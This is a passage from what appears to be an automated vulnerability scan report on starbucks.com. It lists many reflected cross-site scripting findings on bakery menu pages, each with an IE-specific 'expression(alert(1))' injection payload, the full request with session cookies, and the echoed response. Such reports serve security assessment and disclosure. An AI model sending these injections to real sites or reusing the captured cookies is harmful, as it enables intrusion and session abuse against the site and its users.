HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:54:23 GMT Connection: close Content-Length: 43965
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/multigrain-bagel?34ba5"style="x:expression(alert(1))"9c913b552b8=1"/> ...[SNIP]...
1.845. http://www.starbucks.com/menu/food/bakery/old-fashion-glazed-doughnut [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food/bakery/old-fashion-glazed-doughnut
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67354"style%3d"x%3aexpression(alert(1))"1005e24d9c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 67354"style="x:expression(alert(1))"1005e24d9c0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/bakery/old-fashion-glazed-doughnut?67354"style%3d"x%3aexpression(alert(1))"1005e24d9c0=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:55:27 GMT Connection: close Content-Length: 43941
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/old-fashion-glazed-doughnut?67354"style="x:expression(alert(1))"1005e24d9c0=1"/> ...[SNIP]...
1.846. http://www.starbucks.com/menu/food/bakery/outrageous-oatmeal-cookie [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food/bakery/outrageous-oatmeal-cookie
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffe3f"style%3d"x%3aexpression(alert(1))"3b24c4e3b50 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ffe3f"style="x:expression(alert(1))"3b24c4e3b50 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/bakery/outrageous-oatmeal-cookie?ffe3f"style%3d"x%3aexpression(alert(1))"3b24c4e3b50=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:56:10 GMT Connection: close Content-Length: 43745
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/outrageous-oatmeal-cookie?ffe3f"style="x:expression(alert(1))"3b24c4e3b50=1"/> ...[SNIP]...
1.847. http://www.starbucks.com/menu/food/bakery/petite-vanilla-bean-scone [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food/bakery/petite-vanilla-bean-scone
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8dda"style%3d"x%3aexpression(alert(1))"f64420d0491 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f8dda"style="x:expression(alert(1))"f64420d0491 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/bakery/petite-vanilla-bean-scone?f8dda"style%3d"x%3aexpression(alert(1))"f64420d0491=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:56:27 GMT Connection: close Content-Length: 44106
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/petite-vanilla-bean-scone?f8dda"style="x:expression(alert(1))"f64420d0491=1"/> ...[SNIP]...
1.848. http://www.starbucks.com/menu/food/bakery/plain-bagel [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food/bakery/plain-bagel
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa675"style%3d"x%3aexpression(alert(1))"b649a3a4e01 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as aa675"style="x:expression(alert(1))"b649a3a4e01 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/bakery/plain-bagel?aa675"style%3d"x%3aexpression(alert(1))"b649a3a4e01=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:56:19 GMT Connection: close Content-Length: 43603
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/plain-bagel?aa675"style="x:expression(alert(1))"b649a3a4e01=1"/> ...[SNIP]...
1.849. http://www.starbucks.com/menu/food/bakery/pumpkin-bread [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food/bakery/pumpkin-bread
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d96de"style%3d"x%3aexpression(alert(1))"ee177beb35c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d96de"style="x:expression(alert(1))"ee177beb35c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/bakery/pumpkin-bread?d96de"style%3d"x%3aexpression(alert(1))"ee177beb35c=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:57:33 GMT Connection: close Content-Length: 43511
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/pumpkin-bread?d96de"style="x:expression(alert(1))"ee177beb35c=1"/> ...[SNIP]...
1.850. http://www.starbucks.com/menu/food/bakery/raspberry-scone [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food/bakery/raspberry-scone
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59168"style%3d"x%3aexpression(alert(1))"e787100da19 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 59168"style="x:expression(alert(1))"e787100da19 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/bakery/raspberry-scone?59168"style%3d"x%3aexpression(alert(1))"e787100da19=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:59:18 GMT Connection: close Content-Length: 43778
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/raspberry-scone?59168"style="x:expression(alert(1))"e787100da19=1"/> ...[SNIP]...
1.851. http://www.starbucks.com/menu/food/bakery/red-velvet-cupcake [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food/bakery/red-velvet-cupcake
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6abbb"style%3d"x%3aexpression(alert(1))"62d0d1600ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6abbb"style="x:expression(alert(1))"62d0d1600ca in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/bakery/red-velvet-cupcake?6abbb"style%3d"x%3aexpression(alert(1))"62d0d1600ca=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:58:10 GMT Connection: close Content-Length: 44389
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/red-velvet-cupcake?6abbb"style="x:expression(alert(1))"62d0d1600ca=1"/> ...[SNIP]...
1.852. http://www.starbucks.com/menu/food/bakery/reduced-fat-banana-chocolate-chip-coffee-cake [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa4bb"style%3d"x%3aexpression(alert(1))"fdc2532897b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fa4bb"style="x:expression(alert(1))"fdc2532897b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/bakery/reduced-fat-banana-chocolate-chip-coffee-cake?fa4bb"style%3d"x%3aexpression(alert(1))"fdc2532897b=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:57:53 GMT Connection: close Content-Length: 44696
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/reduced-fat-banana-chocolate-chip-coffee-cake?fa4bb"style="x:expression(alert(1))"fdc2532897b=1"/> ...[SNIP]...
1.853. http://www.starbucks.com/menu/food/bakery/reduced-fat-cinnamon-swirl-coffeecake [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0103"style%3d"x%3aexpression(alert(1))"e7f8b0994af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f0103"style="x:expression(alert(1))"e7f8b0994af in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/bakery/reduced-fat-cinnamon-swirl-coffeecake?f0103"style%3d"x%3aexpression(alert(1))"e7f8b0994af=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:58:59 GMT Connection: close Content-Length: 44736
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/reduced-fat-cinnamon-swirl-coffeecake?f0103"style="x:expression(alert(1))"e7f8b0994af=1"/> ...[SNIP]...
1.854. http://www.starbucks.com/menu/food/bakery/reduced-fat-very-berry-coffeecake [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e31eb"style%3d"x%3aexpression(alert(1))"b5a7dd3f58b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e31eb"style="x:expression(alert(1))"b5a7dd3f58b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/bakery/reduced-fat-very-berry-coffeecake?e31eb"style%3d"x%3aexpression(alert(1))"b5a7dd3f58b=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:58:11 GMT Connection: close Content-Length: 44686
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/reduced-fat-very-berry-coffeecake?e31eb"style="x:expression(alert(1))"b5a7dd3f58b=1"/> ...[SNIP]...
1.855. http://www.starbucks.com/menu/food/bakery/starbucks-classic-coffee-cake [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food/bakery/starbucks-classic-coffee-cake
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c557"style%3d"x%3aexpression(alert(1))"640124d6dd5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7c557"style="x:expression(alert(1))"640124d6dd5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/bakery/starbucks-classic-coffee-cake?7c557"style%3d"x%3aexpression(alert(1))"640124d6dd5=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:59:20 GMT Connection: close Content-Length: 44398
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/starbucks-classic-coffee-cake?7c557"style="x:expression(alert(1))"640124d6dd5=1"/> ...[SNIP]...
1.856. http://www.starbucks.com/menu/food/bakery/treat-sized-double-chocolate-cookie [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9f82"style%3d"x%3aexpression(alert(1))"12a2cb3519d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e9f82"style="x:expression(alert(1))"12a2cb3519d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/bakery/treat-sized-double-chocolate-cookie?e9f82"style%3d"x%3aexpression(alert(1))"12a2cb3519d=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:58:01 GMT Connection: close Content-Length: 43344
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/treat-sized-double-chocolate-cookie?e9f82"style="x:expression(alert(1))"12a2cb3519d=1"/> ...[SNIP]...
1.857. http://www.starbucks.com/menu/food/bakery/treat-sized-peanut-butter-cookie [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e303f"style%3d"x%3aexpression(alert(1))"5921d239029 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e303f"style="x:expression(alert(1))"5921d239029 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/bakery/treat-sized-peanut-butter-cookie?e303f"style%3d"x%3aexpression(alert(1))"5921d239029=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:58:36 GMT Connection: close Content-Length: 43323
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/treat-sized-peanut-butter-cookie?e303f"style="x:expression(alert(1))"5921d239029=1"/> ...[SNIP]...
1.858. http://www.starbucks.com/menu/food/bakery/vanilla-bean-cupcake [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food/bakery/vanilla-bean-cupcake
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 177c2"style%3d"x%3aexpression(alert(1))"a4806e71177 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 177c2"style="x:expression(alert(1))"a4806e71177 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/bakery/vanilla-bean-cupcake?177c2"style%3d"x%3aexpression(alert(1))"a4806e71177=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:58:10 GMT Connection: close Content-Length: 44004
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/vanilla-bean-cupcake?177c2"style="x:expression(alert(1))"a4806e71177=1"/> ...[SNIP]...
1.859. http://www.starbucks.com/menu/food/bakery/zucchini-walnut-muffin [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food/bakery/zucchini-walnut-muffin
Issue detail
